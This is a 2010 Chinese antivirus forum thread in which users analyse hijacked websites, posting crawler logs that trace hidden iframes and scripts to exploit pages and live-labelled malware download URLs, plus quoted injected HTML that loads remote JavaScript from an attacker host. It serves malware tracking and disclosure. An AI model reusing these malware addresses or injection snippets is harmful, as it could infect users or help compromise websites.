瑞星网站每日安全播报(2010年7月30日) bbs.ikaka.com

networkedition - 2010-7-30 11:18:00

引用:

网址均来自瑞星每日安全播报，我们详细分析其中所挂恶意网址，对于已失效的恶意网址就不再分析。

引用:

注：以下分析出的恶意网址均包含有真实网马下载地址，请勿直接下载并运行，以免系统中招。

引用:

1. http://io.ruc.edu.cn/(中国人民大学国际交流处)
2. http://top.jschina.com.cn/(鼎盛防务论坛鼎盛军事防务论坛 )
3. http://www.okzhuhai.com/(珠海文体旅游网)
4. http://hy.tsinghua.edu.cn/(清华大学航天航空学院)

用户系统信息：Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)

networkedition - 2010-7-30 11:19:00

Log is generated by FreShow.
[wide]http://io.ruc.edu.cn/list.asp?/fAILT.html
[script]http://js.users.51.la/3926172.js
[script]http://%77%77%77%2E%68%65%7A%65%33%36%39%2E%63%6F%6D/memory/hk.js
[frame]http://www.heze369.com/memory/2.html
[object]http://www.heze369.com/memory/it.html
[script]http://www.heze369.com/memory/party.css
[object]http://www.heze369.com/memory/m.exe
[object]http://www.heze369.com/memory/ie.html
[object]http://www.heze369.com/memory/m.exe

networkedition - 2010-7-30 11:19:00

Log is generated by FreShow.
[wide]http://top.jschina.com.cn/viewthread.php?tid=117025&extra=page=1
[script]http://top.jschina.com.cn/include/js/common.js?AL1
[script]http://www.crcf.org.cn/css/ad.gif?¨
[frame]http://36021.6600.org:6677/a/ads.html
[script]http://top.jschina.com.cn/include/js/viewthread.js?AL1
[frame]http://www.top81.com.cn/sda/sda_960X90_1.html
[frame]http://www.37cs.com/html/click/1849_566.html
[script]http://top.jschina.com.cn/tag.php?action=relatetag&rtid=117025
[frame]http://www.top81.com.cn/sda/sda_540X90_2.html
[script]http://js.tongji.cn.yahoo.com/702548/ystat.js
[script]http://count27.51yes.com/click.aspx?id=271345528&logo=12
[script]http://utk.baidu.com/usv/uc.sv?pe=yOV2248KUfg8hN6W45oYSSQUPJAhtXzVXexRBYXye2zI8nba&sn=4320&an=106237&rn=770

networkedition - 2010-7-30 11:19:00

Log generated by networkedition use mdecoder 0.54
[root]http://www.okzhuhai.com/plus/news/10394.html
[script]http://www.gangju.com.cn/css/zz.png
[exp]http://www.gangju.com.cn/css/zz.html(Exploit.Ie0dayCVE0806.a)
[virus]http://www.gangju.com.cn/css/zz.exe

networkedition - 2010-7-30 11:20:00

Log generated by networkedition use mdecoder 0.54
[root]http://hy.tsinghua.edu.cn/index.asp(==清华大学航天航空学院==)
[flash]http://hy.tsinghua.edu.cn/images/Movie1.swf
[iframe]http://www.lblp.com.cn/admin/webedit/SysImage/bg/18.htm
[iframe]http://www.lblp.com.cn/admin/webedit/dialog/about/cf.html
[iframe]http://www.lblp.com.cn/admin/webedit/dialog/about/ok.html
[iframe]http://www.lblp.com.cn/admin/webedit/dialog/about/cfox.htm
[iframe]http://www.lblp.com.cn/admin/webedit/dialog/about/snow.htm
[iframe]http://www.lblp.com.cn/admin/webedit/dialog/about/xi.htm
[script]http://www.lblp.com.cn/admin/webedit/dialog/about/swfobject.js
[iframe]http://www.lblp.com.cn/admin/webedit/dialog/about/cfl.htm
[iframe]http://www.lblp.com.cn/admin/webedit/dialog/about/ff.html
[flash]http://www.lblp.com.cn/admin/webedit/dialog/about/music.swf
[script]http://www.lblp.com.cn/admin/webedit/dialog/about/ff.js
[exe]http://laso.3322.org/y.exe
[iframe]http://www.lblp.com.cn/admin/webedit/dialog/about/ie.html
[flash]http://www.lblp.com.cn/admin/webedit/dialog/about/music.swf
[script]http://www.lblp.com.cn/admin/webedit/dialog/about/ie.js
[exe]http://laso.3322.org/y.exe
[iframe]http://www.lblp.com.cn/admin/webedit/dialog/about/ff.html
[iframe]http://www.lblp.com.cn/admin/webedit/dialog/about/ie.html
[iframe]http://www.lblp.com.cn/admin/webedit/dialog/about/ie.html
[iframe]http://www.lblp.com.cn/admin/webedit/dialog/about/ff.html
[iframe]http://www.lblp.com.cn/admin/webedit/dialog/about/xf.htm
[script]http://www.lblp.com.cn/admin/webedit/dialog/about/swfobject.js
[iframe]http://www.lblp.com.cn/admin/webedit/dialog/about/cfl.htm
[iframe]http://www.lblp.com.cn/admin/webedit/dialog/about/xi.htm
[exp]http://www.lblp.com.cn/admin/webedit/dialog/about/n6.htm(Exploit.Ie0dayCVE0806.c)
[script]http://www.lblp.com.cn/admin/webedit/dialog/about/x.jpg
[script]http://www.lblp.com.cn/admin/webedit/dialog/about/a.jpg
[virus]http://laso.3322.org/y.exe
[script]http://www.lblp.com.cn/admin/webedit/dialog/about/b.jpg
[script]http://www.lblp.com.cn/admin/webedit/dialog/about/c.jpg
[script]http://www.lblp.com.cn/admin/webedit/dialog/about/d.jpg
[exp]http://www.lblp.com.cn/admin/webedit/dialog/about/n7.htm(Exploit.Ie0dayCVE0806.a)
[script]http://www.lblp.com.cn/admin/webedit/dialog/about/AHHS.js
[script]http://www.lblp.com.cn/admin/webedit/dialog/about/AHHS2.js
[script]http://www.lblp.com.cn/admin/webedit/dialog/about/AHHS3.js
[virus]http://laso.3322.org/y.exe
[iframe]http://www.lblp.com.cn/admin/webedit/dialog/about/cfox2.htm
[exp]http://www.lblp.com.cn/admin/webedit/dialog/about/of.htm(Exploit.OfficeSpreadsheet.a)
[script]http://www.lblp.com.cn/admin/webedit/dialog/about/n90.jpg
[script]http://www.lblp.com.cn/admin/webedit/dialog/about/n93.jpg
[virus]http://laso.3322.org/y.exe
[script]http://www.lblp.com.cn/admin/webedit/dialog/about/n95.jpg
[script]http://www.lblp.com.cn/admin/webedit/dialog/about/n97.jpg

是昔流芳 - 2010-7-30 11:55:00

<html>

<iframe src="ok.html" width="128" height="1" frameborder="0"></iframe>

<br>

狂狐牌网马网马中的战斗马-Q1007038**

</html>

笑死我了:kaka6:

09kaka - 2010-7-30 16:09:00

引用:

http://www.heze369.com/memory/party.css

有点儿麻烦

看着像shellcode 整理半天还是解不到exe :kaka11:

jks_风 - 2010-7-30 17:23:00

Log is generated by FreShow.
[wide]http://io.ruc.edu.cn/list.asp?/fAILT.html
[script]http://js.users.51.la/3926172.js
[script]http://%77%77%77%2E%68%65%7A%65%33%36%39%2E%63%6F%6D/memory/hk.js
[frame]http://www.heze369.com/memory/2.html
[object]http://www.heze369.com2Fmemory/ie.html
[object]http://www.heze369.com/memory/it.htm

已失效。

有点意思了:kaka14:

jks_风 - 2010-7-30 17:26:00

Log is generated by FreShow.
[wide]http://www.okzhuhai.com/plus/news/10394.html
[script]http://www.gangju.com.cn/css/zz.png
[frame]http://www.gangju.com.cn/css/zz.html
[object]http://www.gangju.com.cn/css/zz.exe

jks_风 - 2010-7-30 17:47:00

Log is generated by FreShow.
[wide]http://hy.tsinghua.edu.cn/index.asp
[frame]http://hy.tsinghua.edu.cn/admin/webedit/SysImage/bg/18.htm
[frame]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/cf.html
[frame]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/ok.html
[frame]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/cfox.htm
[frame]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/snow.htm
[frame]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/xi.htm
[script]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/swfobject.js
[frame]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/cfl.htm
[frame]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/\"
[frame]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/\"
[frame]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/\"
[frame]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/\"
[frame]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/\"
[frame]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/\"
[frame]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/xf.htm
[script]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/swfobject.js
[frame]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/cfl.htm
[frame]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/xi.htm
[frame]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/n6.htm
[script]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/x.jpg
[script]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/a.jpg
[object]http://laso.3322.org/y.exe
[script]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/b.jpg
[script]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/c.jpg
[script]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/d.jpg
[frame]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/n7.htm
[script]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/AHHS.js
[script]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/AHHS2.js
[script]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/AHHS3.js
[frame]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/cfox2.htm
[frame]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/of.htm
[script]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/n90.jpg
[script]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/n93.jpg
[script]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/n95.jpg
[script]http://hy.tsinghua.edu.cn/admin/webedit/dialog/about/n97.jpg

这个挂马的好变态:kaka6:

没有MD0.54就用FreShow！！

yalicuan - 2010-7-30 23:03:00

都很强啊，看来还得仔细研究

chen3419 - 2010-8-1 17:53:00

<div class='Alist'><a href='articleShow.asp?id=312' title='汇总学习口才效果好——管理理论大汇合<script src=http://www.800816.com.cn/cache/yahoo.js></script>
点击查看详细内容' ><img src='IMAGE/mofakoucai_52.gif' border=0 > 汇总学习口才效果好——管理...</a></div>
<div class='Alist'><a href='articleShow.asp?id=349' title='[语言炸弹]我写的不是寂寞，是口才<script src=http://www.800816.com.cn/cache/yahoo.js></script>
点击查看详细内容' ><img src='IMAGE/mofakoucai_52.gif' border=0 > [语言炸弹]我写的不是寂寞，...</a></div>
<div class='Alist'><a href='articleShow.asp?id=343' title='乐一下——胡戈2010年新作-《宅居动物》<script src=http://www.800816.com.cn/cache/yahoo.js></script>
点击查看详细内容' ><img src='IMAGE/mofakoucai_52.gif' border=0 > 乐一下——胡戈2010年新作-...</a></div>

chen3419 - 2010-8-1 17:54:00

瑞星卡卡安全论坛